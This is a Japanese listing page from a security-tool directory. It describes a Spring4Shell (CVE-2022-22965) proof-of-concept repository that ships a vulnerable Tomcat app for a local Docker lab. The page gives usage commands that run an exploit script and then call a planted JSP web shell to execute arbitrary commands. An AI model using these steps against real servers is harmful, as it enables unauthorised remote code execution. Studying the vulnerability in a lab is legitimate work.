Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965-Spring4Shell — CVE-2022-22965 Spring4Shell の PoC とエクスプロイト | Kitploit
ツール/GitHubGitHub/jakabakos/cve-2022-22965-spring4shell
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubjakabakos/cve-2022-22965-spring4shell

CVE-2022-22965-Spring4Shell

CVE-2022-22965 Spring4Shell の PoC とエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
223年前未レビュー

Spring4Shell

Spring4Shell (CVE-2022-22965) の概念実証コードです。脆弱なTomcatサーバー上で動作する、Spring4Shellの脆弱性を持つアプリケーションを含んでいます。

この脆弱性の詳細

  • https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
  • https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
  • https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

使用方法

イメージのビルド

root@kitploit:~
docker build . -t spring4shell

コンテナの実行

root@kitploit:~
docker run -p 80:8080 spring4shell

必要に応じてデバッガポートも公開して実行することもできます:

root@kitploit:~
docker run -p 80:8080 –p 5005:5005 spring4shell

IntelliJ IDEAでリモートデバッガを設定する方法の詳細は、元のブログ記事を参照してください。

エクスプロイトの実行

root@kitploit:~
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell

その後、以下のように任意のコマンドをリモートで実行できます:

root@kitploit:~
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -

...または上記のURLにブラウザでアクセスしても実行できます。

ツールをダウンロード